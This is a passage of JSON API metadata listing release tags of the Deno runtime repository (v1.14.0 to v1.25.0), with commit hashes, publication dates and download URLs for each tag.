nload_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"depe